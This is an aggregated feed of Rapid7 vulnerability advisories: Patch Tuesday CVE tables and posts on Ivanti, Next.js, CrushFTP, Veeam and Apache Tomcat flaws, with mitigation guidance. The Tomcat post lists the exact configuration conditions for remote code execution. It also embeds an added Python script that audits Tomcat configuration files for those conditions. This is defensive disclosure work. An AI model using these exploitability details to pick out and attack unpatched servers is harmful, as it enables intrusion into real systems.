CVE-2025-26686 Windows TCP/IP Remote Code Execution Vulnerability No No 7.5
CVE-2025-26680 Windows Standards-Based Storage Management Service Denial of Service Vulnerability No No 7.5
CVE-2025-27470 Windows Standards-Based Storage Management Service Denial of Service Vulnerability No No 7.5
CVE-2025-21174 Windows Standards-Based Storage Management Service Denial of Service Vulnerability No No 7.5
CVE-2025-26652 Windows Standards-Based Storage Management Service Denial of Service Vulnerability No No 7.5
CVE-2025-27485 Windows Standards-Based Storage Management Service Denial of Service Vulnerability No No 7.5
CVE-2025-27486 Windows Standards-Based Storage Management Service Denial of Service Vulnerability No No 7.5
CVE-2025-26668 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability No No 7.5
CVE-2025-26673 Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability No No 7.5
CVE-2025-27469 Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability No No 7.5
CVE-2025-26641 Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability No No 7.5
CVE-2025-27479 Kerberos Key Distribution Proxy Service Denial of Service Vulnerability No No 7.5
CVE-2025-27473 HTTP.sys Denial of Service Vulnerability No No 7.5
CVE-2025-29810 Active Directory Domain Services Elevation of Privilege Vulnerability No No 7.5
CVE-2025-26665 Windows upnphost.dll Elevation of Privilege Vulnerability No No 7
CVE-2025-27478 Windows Local Security Authority (LSA) Elevation of Privilege Vulnerability No No 7
CVE-2025-21191 Windows Local Security Authority (LSA) Elevation of Privilege Vulnerability No No 7
CVE-2025-27732 Windows Graphics Component Elevation of Privilege Vulnerability No No 7
CVE-2025-26637 BitLocker Security Feature Bypass Vulnerability No No 6.8
CVE-2025-26664 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability No No 6.5
CVE-2025-26667 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability No No 6.5
CVE-2025-27474 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability No No 6.5
CVE-2025-21203 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability No No 6.5
CVE-2025-26672 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability No No 6.5
CVE-2025-26676 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability No No 6.5
CVE-2025-27738 Windows Resilient File System (ReFS) Information Disclosure Vulnerability No No 6.5
CVE-2025-21197 Windows NTFS Information Disclosure Vulnerability No No 6.5
CVE-2025-27471 Microsoft Streaming Service Denial of Service Vulnerability No No 5.9
CVE-2025-27742 NTFS Information Disclosure Vulnerability No No 5.5
CVE-2025-27472 Windows Mark of the Web Security Feature Bypass Vulnerability No No 5.4

Windows ESU Microsoft Office vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-26687 Win32k Elevation of Privilege Vulnerability No No 7.5

Ivanti Connect Secure CVE-2025-22457 exploited in the wild

Post Syndicated from Ryan Emmons original https://blog.rapid7.com/2025/04/03/etr-ivanti-connect-secure-cve-2025-22457-exploited-in-the-wild/

On Thursday, April 3, 2025, Ivanti disclosed a critical severity vulnerability affecting Ivanti Connect Secure, Pulse Connect Secure, Policy Secure, and ZTA Gateways. CVE-2025-22457 is a stack-based buffer overflow vulnerability that allows remote, unauthenticated attackers to execute code on the target device. Ivanti’s advisory indicates that CVE-2025-22457 is known to be exploited in the wild; Google’s Mandiant division attributes this activity to suspected China-nexus actors.

Ivanti’s advisory indicates that the vulnerability was “initially identified as a product bug” and patched in Ivanti Connect Secure version 22.7R2.6 (released February 11, 2025). Per Mandiant, CVE-2025-22457 is “a buffer overflow with a limited character space, and therefore it was initially believed to be a low-risk denial-of-service vulnerability.” However, on April 3, Ivanti publicly acknowledged known exploitation in the wild of supported Ivanti Connect Secure and End-of-Support Pulse Connect Secure appliances for remote code execution in some customer environments.

Mitigation guidance

The following products and versions are vulnerable to CVE-2025-22457:

  • Ivanti Connect Secure 22.7R2.5 and prior
  • Pulse Connect Secure (End-of-Support) 9.1R18.9 and prior
  • Ivanti Policy Secure 22.7R1.3 and prior
  • ZTA Gateways 22.8R2 and prior

Ivanti has a full table of affected versions and corresponding solution estimates in their advisory.

A patch is available (initially released on February 11, 2025) for CVE-2025-22457 in Ivanti Connect Secure. However, the advisory states that patches for Ivanti Policy Secure and ZTA Gateways will not be available until April 21, 2025 and April 19, 2025, respectively. Pulse Connect Secure 9.1x reached End-of-Support on December 31, 2024 and won’t be patched. For the latest information, please refer to the Ivanti advisory.

Customers should apply the available Ivanti Connect Secure patch immediately, without waiting for a typical patch cycle to occur. Ivanti’s advisory notes that “Customers should monitor their external ICT and look for web server crashes. If your ICT result shows signs of compromise, you should perform a factory reset on the appliance and then put the appliance back into production using version 22.7R2.6.” Notably, ICT results may vary; a factory reset should be performed if exploitation is suspected, regardless of ICT results.

For the latest information, please refer to the vendor advisory.

Rapid7 customers

InsightVM and Nexpose customers will be able to assess their exposure to CVE-2025-22457 in Ivanti Connect Secure with a vulnerability check expected to be available in today’s (April 3, 2025) content release.

Notable vulnerabilities in Next.js (CVE-2025-29927) and CrushFTP

Post Syndicated from Calum Hutton original https://blog.rapid7.com/2025/03/25/etr-notable-vulnerabilities-in-next-js-cve-2025-29927/

Rapid7 is warning customers of notable vulnerabilities in Next.js, a React framework for building web applications, and CrushFTP, a file transfer technology that has previously been targeted by adversaries.

  • CVE-2025-29927 is a critical improper authorization vulnerability in Next.js middleware that could (theoretically) allow an attacker to bypass authorization checks in a Next.js application, if the authorization check occurs in middleware.
  • No CVE has been assigned (as of March 25, 2025) to an unauthenticated HTTP(S) port access vulnerability in CrushFTP file transfer software.

Neither of the above vulnerabilities is known to have been exploited in the wild as of Tuesday, March 25, 2025. CrushFTP has previously been exploited in the wild for adversary access to (and exfiltration of) sensitive data.

CrushFTP unauthenticated HTTP(S) port access vulnerability (no CVE)

On Friday, March 21, 2025, file transfer software maker CrushFTP disclosed a new vulnerability to customers via email:

[Image: CrushFTP customer notification email of March 21, 2025]

Note: While the email image above indicates only CrushFTP v11 is affected by the still-CVE-less (as of March 25) unauthenticated port access vulnerability, the extremely sparse vendor advisory indicates that both CrushFTP v10 and v11 are affected. According to the vendor, the issue is not exploitable if customers have the DMZ function of CrushFTP in place.

Mitigation guidance: File transfer technologies are high-value targets for ransomware and other adversaries looking to quickly gain access to and exfiltrate sensitive data. Per the email sent to CrushFTP customers on Friday, March 21, the vulnerability is fixed in CrushFTP v11.3.1 (and later). Customers should update immediately, without waiting for a regular patch cycle to occur.

Next.js CVE-2025-29927

CVE-2025-29927 stems from logic associated with how middleware is handled by the application — specifically, an attacker can provide a header in any request to bypass application middleware. Application middleware can perform any number of tasks, and it can stack so that multiple layers of middleware can be configured, with each able to modify the request/response passed to it. Common use cases of middleware include authentication/authorization, CSP validation, URL rewriting/redirection etc.

As the vulnerability affects an application framework, and the application middleware configuration can vary greatly, so too does the potential impact of exploiting the vulnerability. Based on Rapid7’s analysis, there is no ‘one-size-fits-all’ determination of risk/impact for CVE-2025-29927 (which is a common scenario for framework and library vulns). The most severe potential impact likely comes in the form of authentication bypass, but would still be highly application-dependent — the impact of bypassing authentication for a hobbyist “To do list” application is very different from theoretically bypassing authentication in an enterprise application utilising Next.js.

Organizations should consider whether their applications are relying solely on the middleware for authentication. It may be that the application uses middleware, but is just acting as a front end to back-end APIs that are dealing with server-side authentication logic. Bypassing the front-end Next.js middleware would not affect the back end’s ability to authenticate users.

As an example of how a more measured view can change the outlook, a Red Hat advisory for CVE-2025-29927 originally listed two products as affected: Red Hat Trusted Artifact Signer and Streams for Apache Kafka 2. Now these have been removed and classified as “Not affected,” presumably following further review. The advisory was updated with the following: “Red Hat Trusted Artifact Signer and Streams for Apache Kafka 2 are not affected by this vulnerability as they do not use Next.js for any authorization functionality.”

Mitigation guidance: Per the Next.js advisory, CVE-2025-29927 affects the following versions of Next.js:

  • >= 13.0.0, < 13.5.9 (fixed in 13.5.9)
  • >= 14.0.0, < 14.2.25 (fixed in 14.2.25)
  • >= 15.0.0, < 15.2.3 (fixed in 15.2.3)
  • >= 11.1.4, < 12.3.5 (fixed in 12.3.5)

Rapid7 customers

InsightVM and Nexpose customers who run CrushFTP on Linux can assess their exposure to the no-CVE unauthenticated HTTP(S) port access issue with a vulnerability check available in the Friday, March 21 content release.

Our InsightVM coverage team is assessing the feasibility of adding a vulnerability check for Next.js CVE-2025-29927. We will update this blog with further information no later than 6 AM ET on Wednesday, March 26, 2025.

Critical Veeam Backup & Replication CVE-2025-23120

Post Syndicated from Rapid7 original https://blog.rapid7.com/2025/03/19/etr-critical-veeam-backup-and-replication-cve-2025-23120/

On Wednesday, March 19, 2025, backup and recovery software provider Veeam published a security advisory for a critical remote code execution vulnerability tracked as CVE-2025-23120. The vulnerability affects Backup & Replication systems that are domain joined. Veeam explicitly mentions that domain-joined backup servers are against security and compliance best practices, but in reality, we believe this is likely to be a relatively common configuration.

Veeam’s advisory indicates that the vulnerability is authenticated, though the CVSS score for CVE-2025-23120 is listed as 9.9. The advisory itself states that “authenticated domain users” can exploit the vulnerability but says little else — it’s possible that additional exploitation criteria will be published later on. According to Veeam, all supported versions of Backup & Replication are affected.

No public proof-of-concept exploit has been released (at time of this blog’s publication). Veeam Backup & Replication has a very large deployment footprint, and backup solutions are commonly targeted by threat actors. Veeam Backup & Replication should not be exposed to the internet and makes for a more effective internal attack vector than an external vector. Still, plenty of previous Veeam Backup & Replication vulnerabilities have been exploited in the wild, including by ransomware groups.

As we have mentioned previously, more than 20% of Rapid7 incident response cases in 2024 involved Veeam being accessed or exploited in some manner, typically once an adversary has already established a foothold in the target environment.

Mitigation guidance

Veeam Backup & Replication 12.3.0.310 and all earlier version 12 builds are vulnerable to CVE-2025-23120, per the vendor advisory.

Customers should update to the latest version of the software (12.3 build 12.3.1.1139) immediately, without waiting for a regular patch cycle to occur. Per the vendor, unsupported software versions were not tested but should be considered vulnerable.

Rapid7 customers

InsightVM and Nexpose customers will be able to assess their exposure to CVE-2025-23120 with a vulnerability check expected to be available in tomorrow’s (Thursday, March 20) content release.

Apache Tomcat CVE-2025-24813: What You Need to Know

Post Syndicated from Caitlin Condon original https://blog.rapid7.com/2025/03/19/etr-apache-tomcat-cve-2025-24813-what-you-need-to-know/

Here at Rapid7, our usual bar for calling a vulnerability an emergent threat is either known exploitation at scale, or likelihood of exploitation at scale. Apache Tomcat CVE-2025-24813 fulfills neither of these criteria, despite a variety of news headlines alleging broad exploitation in the wild. Tomcat is widely deployed and has seen a number of severe vulnerabilities over the years that have had specific configuration dependencies for successful exploitation — this one follows the same pattern.

TL;DR: Patch, but there’s no need to panic. Here’s what you need to know:

  • CVE-2025-24813 is an unauthenticated remote code execution vulnerability in Apache Tomcat’s partial PUT feature disclosed on March 10, 2025. Fixed versions are available.
  • Under specific circumstances, successful exploitation allows attackers to execute code remotely on target systems via unsafe deserialization.
  • Vulnerability details and proof-of-concept (PoC) exploit code are both publicly available.
  • Based on our analysis and those of other research firms, the conditions required for successful exploitation appear to be specific, non-default, and uncommon.
  • CVE-2025-24813 has reportedly been exploited in the wild; however, Rapid7 has been unable to confirm any successful exploitation occurring against real-world production environments. We assess that “exploitation” in this context likely means unsuccessful exploit attempts rather than successful compromise of production systems.
  • Broad exploitation is unlikely given the specific vulnerable configuration requirements (see Exploitability requirements below).

Rapid7 researchers have tested publicly available PoC code and investigated the conditions Apache indicated were required for exploitation. Like other researchers, our team found that the vendor’s exploitable configuration information differs from what we observed during testing. Additionally, our team assessed the exploitable configuration to be relatively uncommon. Based on a GitHub code search query, only a small number of open-source Tomcat projects published publicly on GitHub are using write-enabled default servlet configurations (a pre-requisite for exploitation) — approximately 200, and most have fewer than 30 stars. Rapid7’s vulnerability research team has a full testing report here.

Exploitability requirements

Per the advisory, an attacker could view security sensitive files and/or inject content into those files if ALL of the following were true:

  • writes enabled for the default servlet (disabled by default)
  • support for partial PUT (enabled by default)
  • a target URL for security sensitive uploads that was a sub-directory of a target URL for public uploads (ed: Rapid7 and other researchers found this to be unnecessary for exploitation)
  • attacker knowledge of the names of security sensitive files being uploaded (ed: Rapid7 and other researchers found this to be unnecessary for exploitation)
  • the security sensitive files also being uploaded via partial PUT (ed: Rapid7 and other researchers found this to be unnecessary for exploitation)

An attacker could achieve remote code execution if ALL of the following were true:

  • writes enabled for the default servlet (disabled by default)
  • support for partial PUT (enabled by default)
  • application was using Tomcat’s file-based session persistence (ed: disabled by default) with the default storage location
  • application included a library that may be leveraged in a deserialization attack (ed: this is the case for many Java applications)
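
The two requirement lists above map directly onto three Tomcat settings: the DefaultServlet's `readonly` and `allowPartialPut` init-params in web.xml, and a `PersistentManager` with a `FileStore` in context.xml. The following audit script is an added example, not Apache's or Rapid7's code; it parses constructed web.xml and context.xml fragments and reports which of the advisory's preconditions a deployment satisfies, assuming the init-param and class names documented for the Tomcat DefaultServlet and session Manager.

```python
"""Audit Tomcat configuration for the CVE-2025-24813 preconditions.

Added example for this post (not Apache's or Rapid7's code). It inspects the
DefaultServlet init-params in web.xml and the session Manager in context.xml.
Assumed names: init-params `readonly` (default true) and `allowPartialPut`
(default true), and the PersistentManager/FileStore class names, as listed in
the Tomcat DefaultServlet and Manager documentation.
"""
import xml.etree.ElementTree as ET

DEFAULT_SERVLET_CLASS = "org.apache.catalina.servlets.DefaultServlet"
PERSISTENT_MANAGER = "org.apache.catalina.session.PersistentManager"
FILE_STORE = "org.apache.catalina.session.FileStore"


def _local(tag: str) -> str:
    """Strip an XML namespace ({uri}name -> name) so web.xml parses for any schema version."""
    return tag.rsplit("}", 1)[-1]


def _child_text(el, name):
    for child in el:
        if _local(child.tag) == name and child.text is not None:
            return child.text.strip()
    return None


def default_servlet_params(web_xml: str) -> dict:
    """Return the DefaultServlet's init-params as {name: value}; {} if it is not declared."""
    root = ET.fromstring(web_xml)
    for servlet in root.iter():
        if _local(servlet.tag) != "servlet":
            continue
        if _child_text(servlet, "servlet-class") != DEFAULT_SERVLET_CLASS:
            continue
        params = {}
        for ip in servlet:
            if _local(ip.tag) == "init-param":
                params[_child_text(ip, "param-name")] = _child_text(ip, "param-value")
        return params
    return {}


def _as_bool(value, default: bool) -> bool:
    # An absent init-param means Tomcat's documented default applies.
    return default if value is None else value.strip().lower() == "true"


def uses_file_session_store(context_xml: str) -> bool:
    """True if sessions are persisted to disk via PersistentManager + FileStore."""
    root = ET.fromstring(context_xml)
    for manager in root.iter("Manager"):
        if manager.get("className") != PERSISTENT_MANAGER:
            continue
        if any(s.get("className") == FILE_STORE for s in manager.iter("Store")):
            return True
    return False


def audit(web_xml: str, context_xml: str) -> dict:
    """Evaluate the advisory's preconditions against a web.xml / context.xml pair."""
    params = default_servlet_params(web_xml)
    writable = not _as_bool(params.get("readonly"), default=True)
    partial_put = _as_bool(params.get("allowPartialPut"), default=True)
    file_store = uses_file_session_store(context_xml)
    return {
        "default_servlet_writable": writable,
        "partial_put_enabled": partial_put,
        "file_session_store": file_store,
        # file view/tamper conditions: writes enabled AND partial PUT supported
        "file_tampering_exposed": writable and partial_put,
        # RCE additionally needs file-based session persistence; the advisory's
        # fourth condition (a deserialization gadget on the classpath) is not
        # visible in configuration and is treated as present, per the post
        "rce_exposed": writable and partial_put and file_store,
    }


# Constructed sample configurations (not from any real deployment).
WEAK_WEB_XML = """<web-app xmlns="https://jakarta.ee/xml/ns/jakartaee" version="6.0">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param><param-name>readonly</param-name><param-value>false</param-value></init-param>
    <init-param><param-name>listings</param-name><param-value>false</param-value></init-param>
  </servlet>
</web-app>"""

HARDENED_WEB_XML = """<web-app xmlns="https://jakarta.ee/xml/ns/jakartaee" version="6.0">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param><param-name>readonly</param-name><param-value>true</param-value></init-param>
    <init-param><param-name>allowPartialPut</param-name><param-value>false</param-value></init-param>
  </servlet>
</web-app>"""

WEAK_CONTEXT_XML = """<Context>
  <Manager className="org.apache.catalina.session.PersistentManager">
    <Store className="org.apache.catalina.session.FileStore"/>
  </Manager>
</Context>"""

DEFAULT_CONTEXT_XML = "<Context><WatchedResource>WEB-INF/web.xml</WatchedResource></Context>"

if __name__ == "__main__":
    for label, w, c in [("weak", WEAK_WEB_XML, WEAK_CONTEXT_XML),
                        ("hardened", HARDENED_WEB_XML, WEAK_CONTEXT_XML)]:
        print(label, audit(w, c))
```

Running it against a real instance means pointing it at `conf/web.xml` (or the app's `WEB-INF/web.xml`, which can override the defaults) and `conf/context.xml` or `META-INF/context.xml`; a deployment with `rce_exposed` true should be upgraded to a fixed version regardless of what else is tightened.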

Mitigation guidance

The following versions of Apache Tomcat are affected:

  • Apache Tomcat 11.0.0-M1 to 11.0.2 (fixed in 11.0.3 or later)
  • Apache Tomcat 10.1.0-M1 to 10.1.34 (fixed in 10.1.35 or later)
  • Apache Tomcat 9.0.0.M1 to 9.0.98 (fixed in 9.0.99 or later)

For the latest information, please see the Apache Software Foundation’s advisory.

Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to CVE-2025-24813 with pre-existing vulnerability checks.

Patch Tuesday – March 2025

Post Syndicated from Adam Barnett original https://blog.rapid7.com/2025/03/11/patch-tuesday-march-2025/

Microsoft is addressing 57 vulnerabilities this March 2025 Patch Tuesday, which is a similar volume to last month. However, Microsoft has evidence of in-the-wild exploitation for as many as six of the vulnerabilities published today, and CISA KEV already lists all of them. Microsoft is also aware of public disclosure for one other vulnerability. This is now the sixth consecutive month where Microsoft has published zero-day vulnerabilities on Patch Tuesday without evaluating any of them as critical severity at time of publication. Today also sees the publication of six critical remote code execution (RCE) vulnerabilities. Ten browser vulnerabilities have already been published separately this month, and are not included in the total.

Win32 kernel subsystem: zero-day EoP

Older Windows products receive a patch today for CVE-2025-24983, which is an elevation of privilege vulnerability in the Win32 kernel subsystem. Microsoft is aware of exploitation in the wild. Since no user interaction is required, and successful exploitation leads to SYSTEM privileges, this isn’t one to ignore, even if the attacker must win a race condition, which does raise the bar for entry somewhat. Microsoft Windows 11 and Server 2019 onwards are not listed as receiving patches, so are presumably not vulnerable. It’s not clear why newer Windows products dodged this particular bullet; the Win32 subsystem is still presumably alive and well, since there is no apparent mention of its demise on the Windows client OS deprecated features list.

NTFS USB attack: zero-day information disclosure

Defense-in-depth practitioners have been limiting and monitoring access to USB ports for years now, and today brings further evidence for the value of locking things down, in the form of CVE-2025-24984, an information disclosure vulnerability in NTFS. Microsoft has evidence of exploitation in the wild, and functional exploit code. This vulnerability has a thus-far-unique combination of attributes: the attack vector is physical — the advisory describes a malicious USB drive as the delivery mechanism — and the weakness is CWE-532: Insertion of Sensitive Information into Log File. The advisory doesn’t quite join the dots, but successful exploitation appears to mean that portions of heap memory could be improperly dumped into a log file, which could then be combed through by an attacker hungry for privileged information. A relatively low CVSSv3 base score of 4.6 reflects the practical difficulties of real-world exploitation, but a motivated attacker can sometimes achieve extraordinary results starting from the smallest of toeholds, and Microsoft does rate this vulnerability as important on its own proprietary severity ranking scale.

NTFS VHD attack: zero-day information disclosure

If you like NTFS zero-day vulnerabilities, then today’s your lucky day! CVE-2025-24991 describes an out-of-bounds read in NTFS leading to information disclosure, specifically disclosure of small portions of heap memory. An attacker would need to trick a user into mounting a malicious VHD (Virtual Hard Disk), and that alone would be enough to trigger the vulnerability. The advisory does not explain how the attacker would exfiltrate the data, but clearly it’s practically possible, since Microsoft claims evidence of exploitation in the wild.

NTFS VHD attack: zero-day code execution

If you like NTFS zero-day vulnerabilities, but find information disclosure a bit pedestrian, then CVE-2025-24993 might be just what you’re after: exploitation requires that the user mount a malicious VHD, which then leads to heap-based buffer overflow, and the potential for local code execution. As is standard for a certain type of code execution vulnerability, the advisory somewhat awkwardly clarifies that the word “remote” in the title refers to the location of the attacker, and that the attack itself is carried out locally. The advisory doesn’t specify the context of code execution, but it’s a safe assumption that the end goal here is SYSTEM, since the attacker or a user must already execute code in the context of the user to trigger the vulnerability. The CVSSv3 base score of 7.8 reflects the potentially valuable reward for exploitation and low attack complexity, but is held back by the requirement for user interaction.

Fast FAT VHD attack: zero-day code execution

The Windows Fast FAT file system driver is the site of CVE-2025-24985, which Microsoft describes as a code execution vulnerability. Exploitation requires that the user mount a malicious VHD, leading to integer overflow or wraparound. Microsoft claims to have confirmed evidence of exploitation in the wild. The acknowledgments sections for CVE-2025-24984, CVE-2025-24991, CVE-2025-24993, and CVE-2025-24985 all credit an anonymous reporter. More than likely this is the same entity in each case, given the similarities between the four vulnerabilities.

Microsoft Management Console: zero-day security feature bypass

It’s been a few months since we saw a zero-day vulnerability in the Microsoft Management Console, but today brings us CVE-2025-26633, a security feature bypass for which Microsoft is aware of exploitation in the wild, as well as functional exploit code floating around somewhere out there on the internet. Successful exploitation leads to an outcome which isn’t specified by the advisory, but since the Microsoft Management Console has a feature set which includes the creation, hosting, and distribution of custom tools for the administrative management of both hardware and software for any supported version of Windows, it’s easy enough to see why an attacker might be interested. The advisory does mention that both preparation of the target environment and subsequent user interaction are required for successful exploitation, which would require the user to open a malicious file.

Microsoft Access: zero-day code execution

CVE-2025-26630 describes a remote-but-actually-local code execution vulnerability in Microsoft Access. Exploitation requires that the user open a malicious file. Microsoft is aware of public disclosure, but considers exploitation less likely. The weakness is our old friend CWE-416: Use After Free. Beyond that, the advisory is short on detail, but does claim that the Preview Pane is not an attack vector, so that’s a silver lining for this particular cloud. Going by the acknowledgements section of the advisory, it seems likely that relative newcomer Unpatched.ai intends to continue to shake things up, since they were also credited with a trio of zero-day Access vulnerabilities published back in January.

WSL magic email attack: critical RCE

The Windows Subsystem for Linux (WSL2) kernel receives a patch today for an arbitrary code execution vulnerability. Microsoft doesn’t claim evidence of public disclosure or in-the-wild exploitation for CVE-2025-24084, but does rank it as critical using its own proprietary severity ranking scale, which goes beyond what the already-significant CVSSv3 base score of 8.4 would suggest. The advisory describes multiple possible attack vectors, but in the worst case, there is no requirement for user interaction, since simply receiving a malicious email would be enough to trigger the vulnerability. The advisory does not clarify the context of code execution, but the magic email attack vector is alarming. Patch accordingly.

Malicious RDP server: critical RCE

How much do you trust the RDP server you’re about to connect to? An attacker in control of a malicious RDP server simply has to wait for a client vulnerable to CVE-2025-26645 to connect in order to achieve remote code execution on the client. Microsoft has assigned a CVSSv3 base score of 8.8 and a severity ranking of critical. While none of us should be connecting to RDP servers we’re not familiar with, an attacker might well see CVE-2025-26645 as a great opportunity for lateral movement and footprint expansion through the network.

Microsoft lifecycle update

In Microsoft product lifecycle news, SQL Server 2019 moved from mainstream support to extended support on 2025-02-28. Looking ahead, Visual Studio App Center will be retired on 2025-03-31, and Dynamics GP 2015 moves past the end of extended support on 2025-04-08.

Summary charts

[Summary charts: Patch Tuesday - March 2025]

Summary tables

Azure vulnerabilities

| CVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score |
|---|---|---|---|---|
| CVE-2025-24049 | Azure Command Line Integration (CLI) Elevation of Privilege Vulnerability | No | No | 8.4 |
| CVE-2025-26627 | Azure Arc Installer Elevation of Privilege Vulnerability | No | No | 7 |
| CVE-2025-21199 | Azure Agent Installer for Backup and Site Recovery Elevation of Privilege Vulnerability | No | No | 6.7 |
| CVE-2025-24986 | Azure Promptflow Remote Code Execution Vulnerability | No | No | 6.5 |

Browser vulnerabilities

| CVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score |
|---|---|---|---|---|
| CVE-2025-26643 | Microsoft Edge (Chromium-based) Spoofing Vulnerability | No | No | 5.4 |
| CVE-2025-1923 | Chromium: CVE-2025-1923 Inappropriate Implementation in Permission Prompts | No | No | N/A |
| CVE-2025-1922 | Chromium: CVE-2025-1922 Inappropriate Implementation in Selection | No | No | N/A |
| CVE-2025-1921 | Chromium: CVE-2025-1921 Inappropriate Implementation in Media Stream | No | No | N/A |
| CVE-2025-1919 | Chromium: CVE-2025-1919 Out of bounds read in Media | No | No | N/A |
| CVE-2025-1918 | Chromium: CVE-2025-1918 Out of bounds read in PDFium | No | No | N/A |
| CVE-2025-1917 | Chromium: CVE-2025-1917 Inappropriate Implementation in Browser UI | No | No | N/A |
| CVE-2025-1916 | Chromium: CVE-2025-1916 Use after free in Profiles | No | No | N/A |
| CVE-2025-1915 | Chromium: CVE-2025-1915 Improper Limitation of a Pathname to a Restricted Directory in DevTools | No | No | N/A |
| CVE-2025-1914 | Chromium: CVE-2025-1914 Out of bounds read in V8 | No | No | N/A |

Developer Tools vulnerabilities

| CVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score |
|---|---|---|---|---|
| CVE-2025-24043 | WinDbg Remote Code Execution Vulnerability | No | No | 7.5 |
| CVE-2025-24998 | Visual Studio Elevation of Privilege Vulnerability | No | No | 7.3 |
| CVE-2025-25003 | Visual Studio Elevation of Privilege Vulnerability | No | No | 7.3 |
| CVE-2025-26631 | Visual Studio Code Elevation of Privilege Vulnerability | No | No | 7.3 |
| CVE-2025-24070 | ASP.NET Core and Visual Studio Elevation of Privilege Vulnerability | No | No | 7 |

ESU Windows vulnerabilities

| CVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score |
|---|---|---|---|---|
| CVE-2025-24056 | Windows Telephony Service Remote Code Execution Vulnerability | No | No | 8.8 |
| CVE-2025-24051 | Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability | No | No | 8.8 |
| CVE-2025-26645 | Remote Desktop Client Remote Code Execution Vulnerability | No | No | 8.8 |
| CVE-2025-24035 | Windows Remote Desktop Services Remote Code Execution Vulnerability | No | No | 8.1 |
| CVE-2025-24045 | Windows Remote Desktop Services Remote Code Execution Vulnerability | No | No | 8.1 |
| CVE-2025-24064 | Windows Domain Name Service Remote Code Execution Vulnerability | No | No | 8.1 |
| CVE-2025-21180 | Windows exFAT File System Remote Code Execution Vulnerability | No | No | 7.8 |
| CVE-2025-24044 | Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability | No | No | 7.8 |
| CVE-2025-24993 | Windows NTFS Remote Code Execution Vulnerability | Yes | No | 7.8 |
| CVE-2025-24985 | Windows Fast FAT File System Driver Remote Code Execution Vulnerability | Yes | No | 7.8 |
| CVE-2025-24059 | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 |
| CVE-2025-24072 | Microsoft Local Security Authority (LSA) Server Elevation of Privilege Vulnerability | No | No | 7.8 |
| CVE-2025-24071 | Microsoft Windows File Explorer Spoofing Vulnerability | No | No | 7.5 |
| CVE-2025-24983 | Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability | Yes | No | 7 |
| CVE-2025-26633 | Microsoft Management Console Security Feature Bypass Vulnerability | Yes | No | 7 |
| CVE-2025-24987 | Windows USB Video Class System Driver Elevation of Privilege Vulnerability | No | No | 6.6 |
| CVE-2025-24988 | Windows USB Video Class System Driver Elevation of Privilege Vulnerability | No | No | 6.6 |
| CVE-2025-24996 | NTLM Hash Disclosure Spoofing Vulnerability | No | No | 6.5 |
| CVE-2025-24054 | NTLM Hash Disclosure Spoofing Vulnerability | No | No | 6.5 |
| CVE-2025-24991 | Windows NTFS Information Disclosure Vulnerability | Yes | No | 5.5 |
| CVE-2025-24992 | Windows NTFS Information Disclosure Vulnerability | No | No | 5.5 |
| CVE-2025-24984 | Windows NTFS Information Disclosure Vulnerability | Yes | No | 4.6 |
| CVE-2025-24055 | Windows USB Video Class System Driver Information Disclosure Vulnerability | No | No | 4.3 |
| CVE-2025-21247 | MapUrlToZone Security Feature Bypass Vulnerability | No | No | 4.3 |
| CVE-2024-9157 | Synaptics: CVE-2024-9157 Synaptics Service Binaries DLL Loading Vulnerability | No | No | N/A |

Microsoft Office vulnerabilities

| CVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score |
|---|---|---|---|---|
| CVE-2025-24077 | Microsoft Word Remote Code Execution Vulnerability | No | No | 7.8 |
| CVE-2025-24079 | Microsoft Word Remote Code Execution Vulnerability | No | No | 7.8 |
| CVE-2025-24057 | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 |
| CVE-2025-24080 | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 |
| CVE-2025-24083 | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 |
| CVE-2025-26629 | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 |
| CVE-2025-24081 | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 |
| CVE-2025-24082 | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 |
| CVE-2025-24075 | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 |
| CVE-2025-26630 | Microsoft Access Remote Code Execution Vulnerability | No | Yes | 7.8 |
| CVE-2025-24078 | Microsoft Word Remote Code Execution Vulnerability | No | No | 7 |

Windows vulnerabilities

| CVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score |
|---|---|---|---|---|
| CVE-2025-24084 | Windows Subsystem for Linux (WSL2) Kernel Remote Code Execution Vulnerability | No | No | 8.4 |
| CVE-2025-24061 | Windows Mark of the Web Security Feature Bypass Vulnerability | No | No | 7.8 |
| CVE-2025-24048 | Windows Hyper-V Elevation of Privilege Vulnerability | No | No | 7.8 |
| CVE-2025-24050 | Windows Hyper-V Elevation of Privilege Vulnerability | No | No | 7.8 |
| CVE-2025-24995 | Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability | No | No | 7.8 |
| CVE-2025-24046 | Kernel Streaming Service Driver Elevation of Privilege Vulnerability | No | No | 7.8 |
| CVE-2025-24066 | Kernel Streaming Service Driver Elevation of Privilege Vulnerability | No | No | 7.8 |
